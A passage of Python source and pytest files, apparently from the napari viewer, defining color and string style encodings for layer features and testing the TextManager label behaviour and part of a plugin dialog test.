encoding_type: Literal['DirectColorEncoding'] = 'DirectColorEncoding'
feature: str
fallback: ColorValue = Field(default_factory=lambda: DEFAULT_COLOR)
def __call__(self, features: Any) -> ColorArray:
# A column-like may be a series or have an object dtype (e.g. color names),
# neither of which transform_color handles, so convert to a list.
return ColorArray.validate_type(list(features[self.feature]))
class NominalColorEncoding(_DerivedStyleEncoding[ColorValue, ColorArray]):
"""Encodes color values from a nominal feature whose values are mapped to colors.
Attributes
----------
feature : str
The name of the feature that contains the nominal values to be mapped to colors.
colormap : CategoricalColormap
Maps the feature values to colors.
fallback : ColorValue
The safe constant fallback color to use if mapping the feature values to
colors fails.
"""
encoding_type: Literal['NominalColorEncoding'] = 'NominalColorEncoding'
feature: str
colormap: CategoricalColormap
fallback: ColorValue = Field(default_factory=lambda: DEFAULT_COLOR)
def __call__(self, features: Any) -> ColorArray:
# map is not expecting some column-likes (e.g. pandas.Series), so ensure
# this is a numpy array first.
values = np.asarray(features[self.feature])
return self.colormap.map(values)
class QuantitativeColorEncoding(_DerivedStyleEncoding[ColorValue, ColorArray]):
"""Encodes color values from a quantitative feature whose values are mapped to colors.
Attributes
----------
feature : str
        The name of the feature that contains the quantitative values to be mapped to colors.
colormap : Colormap
Maps feature values to colors.
contrast_limits : Optional[Tuple[float, float]]
The (min, max) feature values that should respectively map to the first and last
colors in the colormap. If None, then this will attempt to calculate these values
from the feature values each time this generates color values. If that attempt
fails, these are effectively (0, 1).
fallback : ColorValue
The safe constant fallback color to use if mapping the feature values to
colors fails.
"""
encoding_type: Literal[
'QuantitativeColorEncoding'
] = 'QuantitativeColorEncoding'
feature: str
colormap: Colormap
contrast_limits: Optional[Tuple[float, float]] = None
fallback: ColorValue = Field(default_factory=lambda: DEFAULT_COLOR)
def __call__(self, features: Any) -> ColorArray:
values = features[self.feature]
contrast_limits = self.contrast_limits or _calculate_contrast_limits(
values
)
if contrast_limits is not None:
values = np.interp(values, contrast_limits, (0, 1))
return self.colormap.map(values)
@validator('colormap', pre=True, always=True)
def _check_colormap(cls, colormap: ValidColormapArg) -> Colormap:
return ensure_colormap(colormap)
@validator('contrast_limits', pre=True, always=True)
def _check_contrast_limits(
cls, contrast_limits
) -> Optional[Tuple[float, float]]:
if (contrast_limits is not None) and (
contrast_limits[0] >= contrast_limits[1]
):
raise ValueError(
'contrast_limits must be a strictly increasing pair of values'
)
return contrast_limits
def _calculate_contrast_limits(
values: np.ndarray,
) -> Optional[Tuple[float, float]]:
contrast_limits = None
if values.size > 0:
min_value = np.min(values)
max_value = np.max(values)
# Use < instead of != to handle nans.
if min_value < max_value:
contrast_limits = (min_value, max_value)
return contrast_limits
```
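As a quick illustration of the coercion rules implemented by `ColorEncoding.validate` above, a minimal sketch (assuming the module imports as `napari.layers.utils._color_encoding` and that pandas is available; the feature names and colormap choice are arbitrary):
```python
# Minimal sketch of ColorEncoding coercion; paths and data are illustrative.
import pandas as pd
from napari.layers.utils._color_encoding import (
    ColorEncoding,
    ConstantColorEncoding,
    DirectColorEncoding,
    QuantitativeColorEncoding,
)

# A plain string is treated as a feature name (DirectColorEncoding) ...
assert isinstance(ColorEncoding.validate('confidence'), DirectColorEncoding)
# ... while a single RGBA color becomes a ConstantColorEncoding.
assert isinstance(ColorEncoding.validate([1.0, 0.0, 0.0, 1.0]), ConstantColorEncoding)

# A dict selects one of the built-in encodings via its encoding_type.
encoding = ColorEncoding.validate(
    {
        'encoding_type': 'QuantitativeColorEncoding',
        'feature': 'confidence',
        'colormap': 'viridis',
    }
)
assert isinstance(encoding, QuantitativeColorEncoding)

features = pd.DataFrame({'confidence': [0.0, 0.5, 1.0]})
colors = encoding(features)  # contrast limits inferred from the data
print(colors.shape)          # -> (3, 4)
```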
#### File: layers/utils/string_encoding.py
```python
from string import Formatter
from typing import Any, Dict, Sequence, Union
import numpy as np
from pydantic import parse_obj_as
from typing_extensions import Literal, Protocol, runtime_checkable
from ...utils.events.custom_types import Array
from ...utils.translations import trans
from .style_encoding import (
StyleEncoding,
_ConstantStyleEncoding,
_DerivedStyleEncoding,
_ManualStyleEncoding,
)
"""A scalar array that represents one string value."""
StringValue = Array[str, ()]
"""An Nx1 array where each element represents one string value."""
StringArray = Array[str, (-1,)]
"""The default string value, which may also be used a safe fallback string."""
DEFAULT_STRING = np.array('', dtype='<U1')
@runtime_checkable
class StringEncoding(StyleEncoding[StringValue, StringArray], Protocol):
"""Encodes strings from layer features."""
@classmethod
def __get_validators__(cls):
yield cls.validate
@classmethod
def validate(
cls, value: Union['StringEncoding', dict, str, Sequence[str]]
) -> 'StringEncoding':
"""Validates and coerces a value to a StringEncoding.
Parameters
----------
value : StringEncodingArgument
The value to validate and coerce.
If this is already a StringEncoding, it is returned as is.
If this is a dict, then it should represent one of the built-in string encodings.
        If this is a valid format string, then a FormatStringEncoding is returned.
If this is any other string, a DirectStringEncoding is returned.
If this is a sequence of strings, a ManualStringEncoding is returned.
Returns
-------
StringEncoding
Raises
------
TypeError
If the value is not a supported type.
ValidationError
If the value cannot be parsed into a StringEncoding.
"""
if isinstance(value, StringEncoding):
return value
if isinstance(value, dict):
return parse_obj_as(
Union[
ConstantStringEncoding,
ManualStringEncoding,
DirectStringEncoding,
FormatStringEncoding,
],
value,
)
if isinstance(value, str):
if _is_format_string(value):
return FormatStringEncoding(format=value)
return DirectStringEncoding(feature=value)
if isinstance(value, Sequence):
return ManualStringEncoding(array=value, default=DEFAULT_STRING)
raise TypeError(
trans._(
'value should be a StringEncoding, a dict, a string, a sequence of strings, or None',
deferred=True,
)
)
class ConstantStringEncoding(_ConstantStyleEncoding[StringValue, StringArray]):
"""Encodes color values from a single constant color.
Attributes
----------
constant : StringValue
The constant string value.
encoding_type : Literal['ConstantStringEncoding']
The type of encoding this specifies, which is useful for distinguishing
this from other encodings when passing this as a dictionary.
"""
constant: StringValue
encoding_type: Literal['ConstantStringEncoding'] = 'ConstantStringEncoding'
class ManualStringEncoding(_ManualStyleEncoding[StringValue, StringArray]):
"""Encodes string values manually in an array.
Attributes
----------
array : StringArray
The array of string values.
default : StringValue
The default string value that is used when requesting a value that
is out of bounds in the array attribute.
encoding_type : Literal['ManualStringEncoding']
The type of encoding this specifies, which is useful for distinguishing
this from other encodings when passing this as a dictionary.
"""
array: StringArray
default: StringValue = DEFAULT_STRING
encoding_type: Literal['ManualStringEncoding'] = 'ManualStringEncoding'
class DirectStringEncoding(_DerivedStyleEncoding[StringValue, StringArray]):
"""Encodes strings directly from a feature column.
Attributes
----------
feature : str
The name of the feature that contains the desired strings.
fallback : StringValue
The safe constant fallback string to use if the feature column
does not contain valid string values.
encoding_type : Literal['DirectStringEncoding']
The type of encoding this specifies, which is useful for distinguishing
this from other encodings when passing this as a dictionary.
"""
feature: str
fallback: StringValue = DEFAULT_STRING
encoding_type: Literal['DirectStringEncoding'] = 'DirectStringEncoding'
def __call__(self, features: Any) -> StringArray:
return np.array(features[self.feature], dtype=str)
class FormatStringEncoding(_DerivedStyleEncoding[StringValue, StringArray]):
"""Encodes string values by formatting feature values.
Attributes
----------
format : str
A format string with the syntax supported by :func:`str.format`,
where all format fields should be feature names.
fallback : StringValue
The safe constant fallback string to use if the format string
is not valid or contains fields other than feature names.
encoding_type : Literal['FormatStringEncoding']
The type of encoding this specifies, which is useful for distinguishing
this from other encodings when passing this as a dictionary.
"""
format: str
fallback: StringValue = DEFAULT_STRING
encoding_type: Literal['FormatStringEncoding'] = 'FormatStringEncoding'
def __call__(self, features: Any) -> StringArray:
values = [
self.format.format(**_get_feature_row(features, i))
for i in range(len(features))
]
return np.array(values, dtype=str)
def _get_feature_row(features: Any, index: int) -> Dict[str, Any]:
"""Returns one row of the features table as a dictionary."""
return {name: values.iloc[index] for name, values in features.items()}
def _is_format_string(string: str) -> bool:
"""Returns True if a string is a valid format string with at least one field, False otherwise."""
try:
fields = tuple(
field
for _, field, _, _ in Formatter().parse(string)
if field is not None
)
except ValueError:
return False
return len(fields) > 0
```
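A similar sketch for the coercion rules in `StringEncoding.validate` above (again assuming the module imports as `napari.layers.utils.string_encoding`; feature names are arbitrary):
```python
# Minimal sketch of StringEncoding coercion; data is illustrative.
import pandas as pd
from napari.layers.utils.string_encoding import (
    DirectStringEncoding,
    FormatStringEncoding,
    StringEncoding,
)

features = pd.DataFrame({'class': ['A', 'B'], 'confidence': [0.9, 0.4]})

# A string with at least one format field becomes a FormatStringEncoding ...
fmt = StringEncoding.validate('{class}: {confidence:.1f}')
assert isinstance(fmt, FormatStringEncoding)
print(fmt(features))     # -> ['A: 0.9' 'B: 0.4']

# ... while any other string is read as a feature name (DirectStringEncoding).
direct = StringEncoding.validate('class')
assert isinstance(direct, DirectStringEncoding)
print(direct(features))  # -> ['A' 'B']
```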
#### File: layers/utils/style_encoding.py
```python
import warnings
from abc import ABC, abstractmethod
from typing import Any, Generic, List, TypeVar, Union
import numpy as np
from typing_extensions import Protocol, runtime_checkable
from ...utils.events import EventedModel
from ...utils.translations import trans
IndicesType = Union[range, List[int], np.ndarray]
"""The variable type of a single style value."""
StyleValue = TypeVar('StyleValue', bound=np.ndarray)
"""The variable type of multiple style values in an array."""
StyleArray = TypeVar('StyleArray', bound=np.ndarray)
@runtime_checkable
class StyleEncoding(Protocol[StyleValue, StyleArray]):
"""Encodes generic style values, like colors and strings, from layer features.
The public API of any StyleEncoding is just __call__, such that it can
be called to generate style values from layer features. That call should
be stateless, in that the values returned only depend on the given features.
A StyleEncoding also has a private API that provides access to and mutation
of previously generated and cached style values. This currently needs to be
implemented to maintain some related behaviors in napari, but may be removed
from this protocol in the future.
"""
def __call__(self, features: Any) -> Union[StyleValue, StyleArray]:
"""Apply this encoding with the given features to generate style values.
Parameters
----------
features : Dataframe-like
The layer features table from which to derive the output values.
Returns
-------
Union[StyleValue, StyleArray]
Either a single style value (e.g. from a constant encoding) or an
array of encoded values the same length as the given features.
Raises
------
KeyError, ValueError
If generating values from the given features fails.
"""
@property
def _values(self) -> Union[StyleValue, StyleArray]:
"""The previously generated and cached values."""
def _apply(self, features: Any) -> None:
"""Applies this to the tail of the given features and updates cached values.
If the cached values are longer than the given features, this will remove
the extra cached values. If they are the same length, this may do nothing.
Parameters
----------
features : Dataframe-like
The full layer features table from which to derive the output values.
"""
def _append(self, array: StyleArray) -> None:
"""Appends raw style values to cached values.
This is useful for supporting the paste operation in layers.
Parameters
----------
array : StyleArray
The values to append. The dimensionality of these should match that of the existing style values.
"""
def _delete(self, indices: IndicesType) -> None:
"""Deletes cached style values by index.
Parameters
----------
indices
The indices of the style values to remove.
"""
def _clear(self) -> None:
"""Clears all previously generated and cached values."""
def _json_encode(self) -> dict:
"""Convert this to a dictionary that can be passed to json.dumps.
Returns
-------
dict
The dictionary representation of this with JSON compatible keys and values.
"""
class _StyleEncodingModel(EventedModel):
class Config:
# Forbid extra initialization parameters instead of ignoring
# them by default. This is useful when parsing style encodings
# from dicts, as different types of encodings may have the same
# field names.
# https://pydantic-docs.helpmanual.io/usage/model_config/#options
extra = 'forbid'
# The following classes provide generic implementations of common ways
# to encode style values, like constant, manual, and derived encodings.
# They inherit Python's built-in `Generic` type, so that an encoding with
# a specific output type can inherit the generic type annotations from
# this class along with the functionality it provides. For example,
# `ConstantStringEncoding.__call__` returns an `Array[str, ()]` whereas
# `ConstantColorEncoding.__call__` returns an `Array[float, (4,)]`.
# For more information on `Generic`, see the official docs.
# https://docs.python.org/3/library/typing.html#generics
class _ConstantStyleEncoding(
_StyleEncodingModel, Generic[StyleValue, StyleArray]
):
"""Encodes a constant style value.
This encoding is generic so that it can be used to implement style
encodings with different value types like Array[]
Attributes
----------
constant : StyleValue
The constant style value.
"""
constant: StyleValue
def __call__(self, features: Any) -> Union[StyleValue, StyleArray]:
return self.constant
@property
def _values(self) -> Union[StyleValue, StyleArray]:
return self.constant
def _apply(self, features: Any) -> None:
pass
def _append(self, array: StyleArray) -> None:
pass
def _delete(self, indices: IndicesType) -> None:
pass
def _clear(self) -> None:
pass
def _json_encode(self) -> dict:
return self.dict()
class _ManualStyleEncoding(
_StyleEncodingModel, Generic[StyleValue, StyleArray]
):
"""Encodes style values manually.
The style values are encoded manually in the array attribute, so that
attribute can be written to make persistent updates.
Attributes
----------
array : np.ndarray
The array of values.
default : np.ndarray
The default style value that is used when ``array`` is shorter than
the given features.
"""
array: StyleArray
default: StyleValue
def __call__(self, features: Any) -> Union[StyleArray, StyleValue]:
n_values = self.array.shape[0]
n_rows = features.shape[0]
if n_rows > n_values:
tail_array = np.array([self.default] * (n_rows - n_values))
return np.append(self.array, tail_array, axis=0)
return np.array(self.array[:n_rows])
@property
def _values(self) -> Union[StyleValue, StyleArray]:
return self.array
def _apply(self, features: Any) -> None:
self.array = self(features)
def _append(self, array: StyleArray) -> None:
self.array = np.append(self.array, array, axis=0)
def _delete(self, indices: IndicesType) -> None:
self.array = np.delete(self.array, indices, axis=0)
def _clear(self) -> None:
pass
def _json_encode(self) -> dict:
return self.dict()
class _DerivedStyleEncoding(
_StyleEncodingModel, Generic[StyleValue, StyleArray], ABC
):
"""Encodes style values by deriving them from feature values.
Attributes
----------
fallback : StyleValue
The fallback style value.
"""
fallback: StyleValue
_cached: StyleArray
def __init__(self, **kwargs):
super().__init__(**kwargs)
self._cached = _empty_array_like(self.fallback)
@abstractmethod
def __call__(self, features: Any) -> Union[StyleValue, StyleArray]:
pass
@property
def _values(self) -> Union[StyleValue, StyleArray]:
return self._cached
def _apply(self, features: Any) -> None:
n_cached = self._cached.shape[0]
n_rows = features.shape[0]
if n_cached < n_rows:
tail_array = self._call_safely(features.iloc[n_cached:n_rows])
self._append(tail_array)
elif n_cached > n_rows:
self._cached = self._cached[:n_rows]
def _call_safely(self, features: Any) -> StyleArray:
"""Calls this without raising encoding errors, warning instead."""
try:
array = self(features)
except (KeyError, ValueError):
warnings.warn(
trans._(
'Applying the encoding failed. Using the safe fallback value instead.',
deferred=True,
),
category=RuntimeWarning,
)
shape = (features.shape[0],) + self.fallback.shape
array = np.broadcast_to(self.fallback, shape)
return array
def _append(self, array: StyleArray) -> None:
self._cached = np.append(self._cached, array, axis=0)
def _delete(self, indices: IndicesType) -> None:
self._cached = np.delete(self._cached, indices, axis=0)
def _clear(self) -> None:
self._cached = _empty_array_like(self.fallback)
def _json_encode(self) -> dict:
return self.dict()
def _get_style_values(
encoding: StyleEncoding[StyleValue, StyleArray], indices: IndicesType
):
"""Returns a scalar style value or indexes non-scalar style values."""
values = encoding._values
return values if values.ndim == 0 else values[indices]
def _empty_array_like(value: StyleValue) -> StyleArray:
"""Returns an empty array with the same type and remaining shape of the given value."""
shape = (0,) + value.shape
return np.empty_like(value, shape=shape)
```
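The padding and truncation behaviour described for `_ManualStyleEncoding.__call__` is easiest to see through one of its concrete subclasses; a small sketch using `ManualStringEncoding` from the module above (import path assumed as before):
```python
# Minimal sketch of the manual-encoding padding rule; data is illustrative.
import pandas as pd
from napari.layers.utils.string_encoding import ManualStringEncoding

enc = ManualStringEncoding(array=['A', 'B', 'C'], default='D')

# More feature rows than stored values: the default pads the tail.
print(enc(pd.DataFrame(index=range(5))))  # -> ['A' 'B' 'C' 'D' 'D']

# Fewer rows than stored values: the output is truncated to match.
print(enc(pd.DataFrame(index=range(2))))  # -> ['A' 'B']
```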
#### File: utils/_tests/test_text_manager.py
```python
import numpy as np
import pandas as pd
import pytest
from pydantic import ValidationError
from napari.layers.utils.string_encoding import (
ConstantStringEncoding,
FormatStringEncoding,
ManualStringEncoding,
)
from napari.layers.utils.text_manager import TextManager
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_empty_text_manager_property():
"""Test creating an empty text manager in property mode.
This is for creating an empty layer with text initialized.
"""
properties = {'confidence': np.empty(0, dtype=float)}
text_manager = TextManager(
text='confidence', n_text=0, properties=properties
)
assert text_manager.values.size == 0
# add a text element
new_properties = {'confidence': np.array([0.5])}
text_manager.add(new_properties, 1)
np.testing.assert_equal(text_manager.values, ['0.5'])
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_add_many_text_property():
properties = {'confidence': np.empty(0, dtype=float)}
text_manager = TextManager(
text='confidence',
n_text=0,
properties=properties,
)
text_manager.add({'confidence': np.array([0.5])}, 2)
np.testing.assert_equal(text_manager.values, ['0.5'] * 2)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_empty_text_manager_format():
"""Test creating an empty text manager in formatted mode.
This is for creating an empty layer with text initialized.
"""
properties = {'confidence': np.empty(0, dtype=float)}
text = 'confidence: {confidence:.2f}'
text_manager = TextManager(text=text, n_text=0, properties=properties)
assert text_manager.values.size == 0
# add a text element
new_properties = {'confidence': np.array([0.5])}
text_manager.add(new_properties, 1)
np.testing.assert_equal(text_manager.values, ['confidence: 0.50'])
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_add_many_text_formatted():
properties = {'confidence': np.empty(0, dtype=float)}
text_manager = TextManager(
text='confidence: {confidence:.2f}',
n_text=0,
properties=properties,
)
text_manager.add({'confidence': np.array([0.5])}, 2)
np.testing.assert_equal(text_manager.values, ['confidence: 0.50'] * 2)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_text_manager_property():
n_text = 3
text = 'class'
classes = np.array(['A', 'B', 'C'])
properties = {'class': classes, 'confidence': np.array([0.5, 0.3, 1])}
text_manager = TextManager(text=text, n_text=n_text, properties=properties)
np.testing.assert_equal(text_manager.values, classes)
# add new text with properties
new_properties = {'class': np.array(['A']), 'confidence': np.array([0.5])}
text_manager.add(new_properties, 1)
expected_text_2 = np.concatenate([classes, ['A']])
np.testing.assert_equal(text_manager.values, expected_text_2)
# remove the first text element
text_manager.remove({0})
np.testing.assert_equal(text_manager.values, expected_text_2[1::])
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_text_manager_format():
n_text = 3
text = 'confidence: {confidence:.2f}'
classes = np.array(['A', 'B', 'C'])
properties = {'class': classes, 'confidence': np.array([0.5, 0.3, 1])}
expected_text = np.array(
['confidence: 0.50', 'confidence: 0.30', 'confidence: 1.00']
)
text_manager = TextManager(text=text, n_text=n_text, properties=properties)
np.testing.assert_equal(text_manager.values, expected_text)
# add new text with properties
new_properties = {'class': np.array(['A']), 'confidence': np.array([0.5])}
text_manager.add(new_properties, 1)
expected_text_2 = np.concatenate([expected_text, ['confidence: 0.50']])
np.testing.assert_equal(text_manager.values, expected_text_2)
# test getting the text elements when there are none in view
text_view = text_manager.view_text([])
np.testing.assert_equal(text_view, np.empty((0,), dtype=str))
# test getting the text elements when the first two elements are in view
text_view = text_manager.view_text([0, 1])
np.testing.assert_equal(text_view, expected_text_2[0:2])
text_manager.anchor = 'center'
coords = np.array([[0, 0], [10, 10], [20, 20]])
text_coords = text_manager.compute_text_coords(coords, ndisplay=3)
np.testing.assert_equal(text_coords, (coords, 'center', 'center'))
# remove the first text element
text_manager.remove({0})
np.testing.assert_equal(text_manager.values, expected_text_2[1::])
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_refresh_text():
n_text = 3
text = 'class'
classes = np.array(['A', 'B', 'C'])
properties = {'class': classes, 'confidence': np.array([0.5, 0.3, 1])}
text_manager = TextManager(text=text, n_text=n_text, properties=properties)
new_classes = np.array(['D', 'E', 'F'])
new_properties = {
'class': new_classes,
'confidence': np.array([0.5, 0.3, 1]),
}
text_manager.refresh_text(new_properties)
np.testing.assert_equal(new_classes, text_manager.values)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_equality():
n_text = 3
text = 'class'
classes = np.array(['A', 'B', 'C'])
properties = {'class': classes, 'confidence': np.array([0.5, 0.3, 1])}
text_manager_1 = TextManager(
text=text, n_text=n_text, properties=properties, color='red'
)
text_manager_2 = TextManager(
text=text, n_text=n_text, properties=properties, color='red'
)
assert text_manager_1 == text_manager_2
assert not (text_manager_1 != text_manager_2)
text_manager_2.color = 'blue'
assert text_manager_1 != text_manager_2
assert not (text_manager_1 == text_manager_2)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_blending_modes():
n_text = 3
text = 'class'
classes = np.array(['A', 'B', 'C'])
properties = {'class': classes, 'confidence': np.array([0.5, 0.3, 1])}
text_manager = TextManager(
text=text,
n_text=n_text,
properties=properties,
color='red',
blending='translucent',
)
assert text_manager.blending == 'translucent'
# set to another valid blending mode
text_manager.blending = 'additive'
assert text_manager.blending == 'additive'
# set to opaque, which is not allowed
with pytest.warns(RuntimeWarning):
text_manager.blending = 'opaque'
assert text_manager.blending == 'translucent'
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_text_with_invalid_format_string_then_fallback_with_warning():
n_text = 3
text = 'confidence: {confidence:.2f'
properties = {'confidence': np.array([0.5, 0.3, 1])}
with pytest.warns(RuntimeWarning):
text_manager = TextManager(
text=text, n_text=n_text, properties=properties
)
np.testing.assert_array_equal(text_manager.values, [''] * n_text)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_text_with_format_string_missing_property_then_fallback_with_warning():
n_text = 3
text = 'score: {score:.2f}'
properties = {'confidence': np.array([0.5, 0.3, 1])}
with pytest.warns(RuntimeWarning):
text_manager = TextManager(
text=text, n_text=n_text, properties=properties
)
np.testing.assert_array_equal(text_manager.values, [''] * n_text)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_text_constant_then_repeat_values():
n_text = 3
properties = {'class': np.array(['A', 'B', 'C'])}
text_manager = TextManager(
text={'constant': 'point'}, n_text=n_text, properties=properties
)
np.testing.assert_array_equal(text_manager.values, ['point'] * n_text)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_text_constant_with_no_properties():
text_manager = TextManager(text={'constant': 'point'}, n_text=3)
np.testing.assert_array_equal(text_manager.values, ['point'] * 3)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_add_with_text_constant():
n_text = 3
properties = {'class': np.array(['A', 'B', 'C'])}
text_manager = TextManager(
text={'constant': 'point'}, n_text=n_text, properties=properties
)
np.testing.assert_array_equal(text_manager.values, ['point'] * 3)
text_manager.add({'class': np.array(['C'])}, 2)
np.testing.assert_array_equal(text_manager.values, ['point'] * 5)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_add_with_text_constant_init_empty():
properties = {}
text_manager = TextManager(
text={'constant': 'point'}, n_text=0, properties=properties
)
text_manager.add({'class': np.array(['C'])}, 2)
np.testing.assert_array_equal(text_manager.values, ['point'] * 2)
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_remove_with_text_constant_then_ignored():
n_text = 5
properties = {'class': np.array(['A', 'B', 'C', 'D', 'E'])}
text_manager = TextManager(
text={'constant': 'point'}, n_text=n_text, properties=properties
)
text_manager.remove([1, 3])
np.testing.assert_array_equal(text_manager.values, ['point'] * n_text)
def test_from_layer():
text = {
'string': 'class',
'translation': [-0.5, 1],
'visible': False,
}
features = pd.DataFrame(
{
'class': np.array(['A', 'B', 'C']),
'confidence': np.array([1, 0.5, 0]),
}
)
text_manager = TextManager._from_layer(
text=text,
features=features,
)
np.testing.assert_array_equal(text_manager.values, ['A', 'B', 'C'])
np.testing.assert_array_equal(text_manager.translation, [-0.5, 1])
assert not text_manager.visible
def test_from_layer_with_no_text():
features = pd.DataFrame({})
text_manager = TextManager._from_layer(
text=None,
features=features,
)
assert text_manager.string == ConstantStringEncoding(constant='')
def test_update_from_layer():
text = {
'string': 'class',
'translation': [-0.5, 1],
'visible': False,
}
features = pd.DataFrame(
{
'class': ['A', 'B', 'C'],
'confidence': [1, 0.5, 0],
}
)
text_manager = TextManager._from_layer(
text=text,
features=features,
)
text = {
'string': 'Conf: {confidence:.2f}',
'translation': [1.5, -2],
'size': 9000,
}
text_manager._update_from_layer(text=text, features=features)
np.testing.assert_array_equal(
text_manager.values, ['Conf: 1.00', 'Conf: 0.50', 'Conf: 0.00']
)
np.testing.assert_array_equal(text_manager.translation, [1.5, -2])
assert text_manager.visible
assert text_manager.size == 9000
def test_update_from_layer_with_invalid_value_fails_safely():
features = pd.DataFrame(
{
'class': ['A', 'B', 'C'],
'confidence': [1, 0.5, 0],
}
)
text_manager = TextManager._from_layer(
text='class',
features=features,
)
before = text_manager.copy(deep=True)
text = {
'string': 'confidence',
'size': -3,
}
with pytest.raises(ValidationError):
text_manager._update_from_layer(text=text, features=features)
assert text_manager == before
def test_update_from_layer_with_warning_only_one_emitted():
features = pd.DataFrame({'class': ['A', 'B', 'C']})
text_manager = TextManager._from_layer(
text='class',
features=features,
)
text = {
'string': 'class',
'blending': 'opaque',
}
with pytest.warns(RuntimeWarning) as record:
text_manager._update_from_layer(
text=text,
features=features,
)
assert len(record) == 1
def test_init_with_constant_string():
text_manager = TextManager(string={'constant': 'A'})
assert text_manager.string == ConstantStringEncoding(constant='A')
np.testing.assert_array_equal(text_manager.values, 'A')
def test_init_with_manual_string():
features = pd.DataFrame(index=range(3))
text_manager = TextManager(string=['A', 'B', 'C'], features=features)
assert text_manager.string == ManualStringEncoding(array=['A', 'B', 'C'])
np.testing.assert_array_equal(text_manager.values, ['A', 'B', 'C'])
def test_init_with_format_string():
features = pd.DataFrame({'class': ['A', 'B', 'C']})
text_manager = TextManager(string='class: {class}', features=features)
assert text_manager.string == FormatStringEncoding(format='class: {class}')
np.testing.assert_array_equal(
text_manager.values, ['class: A', 'class: B', 'class: C']
)
def test_apply_with_constant_string():
features = pd.DataFrame(index=range(3))
text_manager = TextManager(string={'constant': 'A'})
features = pd.DataFrame(index=range(5))
text_manager.apply(features)
np.testing.assert_array_equal(text_manager.values, 'A')
def test_apply_with_manual_string():
string = {
'array': ['A', 'B', 'C'],
'default': 'D',
}
features = pd.DataFrame(index=range(3))
text_manager = TextManager(string=string, features=features)
features = pd.DataFrame(index=range(5))
text_manager.apply(features)
np.testing.assert_array_equal(
text_manager.values, ['A', 'B', 'C', 'D', 'D']
)
def test_apply_with_derived_string():
features = pd.DataFrame({'class': ['A', 'B', 'C']})
text_manager = TextManager(string='class: {class}', features=features)
features = pd.DataFrame({'class': ['A', 'B', 'C', 'D', 'E']})
text_manager.apply(features)
np.testing.assert_array_equal(
text_manager.values,
['class: A', 'class: B', 'class: C', 'class: D', 'class: E'],
)
def test_refresh_with_constant_string():
features = pd.DataFrame(index=range(3))
text_manager = TextManager(string={'constant': 'A'})
text_manager.string = {'constant': 'B'}
text_manager.refresh(features)
np.testing.assert_array_equal(text_manager.values, 'B')
def test_refresh_with_manual_string():
features = pd.DataFrame(index=range(3))
text_manager = TextManager(string=['A', 'B', 'C'], features=features)
text_manager.string = ['C', 'B', 'A']
text_manager.refresh(features)
np.testing.assert_array_equal(text_manager.values, ['C', 'B', 'A'])
def test_refresh_with_derived_string():
features = pd.DataFrame({'class': ['A', 'B', 'C']})
text_manager = TextManager(string='class: {class}', features=features)
features = pd.DataFrame({'class': ['E', 'D', 'C', 'B', 'A']})
text_manager.refresh(features)
np.testing.assert_array_equal(
text_manager.values,
['class: E', 'class: D', 'class: C', 'class: B', 'class: A'],
)
def test_copy_paste_with_constant_string():
features = pd.DataFrame(index=range(3))
text_manager = TextManager(string={'constant': 'A'}, features=features)
copied = text_manager._copy([0, 2])
text_manager._paste(**copied)
np.testing.assert_array_equal(text_manager.values, 'A')
def test_copy_paste_with_manual_string():
features = pd.DataFrame(index=range(3))
text_manager = TextManager(string=['A', 'B', 'C'], features=features)
copied = text_manager._copy([0, 2])
text_manager._paste(**copied)
np.testing.assert_array_equal(
text_manager.values, ['A', 'B', 'C', 'A', 'C']
)
def test_copy_paste_with_derived_string():
features = pd.DataFrame({'class': ['A', 'B', 'C']})
text_manager = TextManager(string='class: {class}', features=features)
copied = text_manager._copy([0, 2])
text_manager._paste(**copied)
np.testing.assert_array_equal(
text_manager.values,
['class: A', 'class: B', 'class: C', 'class: A', 'class: C'],
)
def test_serialization():
features = pd.DataFrame(
{'class': ['A', 'B', 'C'], 'confidence': [0.5, 0.3, 1]}
)
original = TextManager(features=features, string='class', color='red')
serialized = original.dict()
deserialized = TextManager(**serialized)
assert original == deserialized
def test_view_text_with_constant_text():
features = pd.DataFrame(index=range(3))
text_manager = TextManager(string={'constant': 'A'}, features=features)
copied = text_manager._copy([0, 2])
text_manager._paste(**copied)
actual = text_manager.view_text([0, 1])
# view_text promises to return an Nx1 array, not just something
# broadcastable to an Nx1, so explicitly check the length
# because assert_array_equal broadcasts scalars automatically
assert len(actual) == 2
np.testing.assert_array_equal(actual, ['A', 'A'])
```
#### File: dialogs/_tests/test_qt_plugin_dialog.py
```python
from typing import Generator, Optional, Tuple
import pytest
from npe2 import PackageMetadata
from napari._qt.dialogs import qt_plugin_dialog
def _iter_napari_hub_or_pypi_plugin_info(
conda_forge: bool,
) -> Generator[Tuple[Optional[PackageMetadata], bool], None, None]:
"""Mock the hub and pypi methods to collect available plugins.
This will mock `napari.plugins.hub.iter_hub_plugin_info` for napari-hub,
and `napari.plugins.pypi.iter_napari_plugin_info` for pypi.
It will return two fake plugins that will populate the available plugins
list (the bottom one). The first plugin will not be available on
conda-forge so will be greyed out ("test-name-0"). The second plugin will
be available on conda-forge so will be enabled ("test-name-1").
"""
    # This mock `base_data` will be the same for both fake plugins.
base_data = {
"metadata_version": "1.0",
"version": "0.1.0",
"summary": "some test package",
"home_page": "http://napari.org",
"author": "test author",
"license": "UNKNOWN",
}
for i in range(2):
yield PackageMetadata(name=f"test-name-{i}", **base_data), bool(i)
@pytest.fixture
def plugin_dialog(qtbot, monkeypatch):
"""Fixture that provides a plugin dialog for a normal napari install."""
for method_name in ["iter_hub_plugin_info", "iter_napari_plugin_info"]:
monkeypatch.setattr(
qt_plugin_dialog,
method_name,
_iter_napari_hub_or_pypi_plugin_info,
)
# This is patching `napari.utils.misc.running_as_constructor_app` function
# to mock a normal napari install.
monkeypatch.setattr(
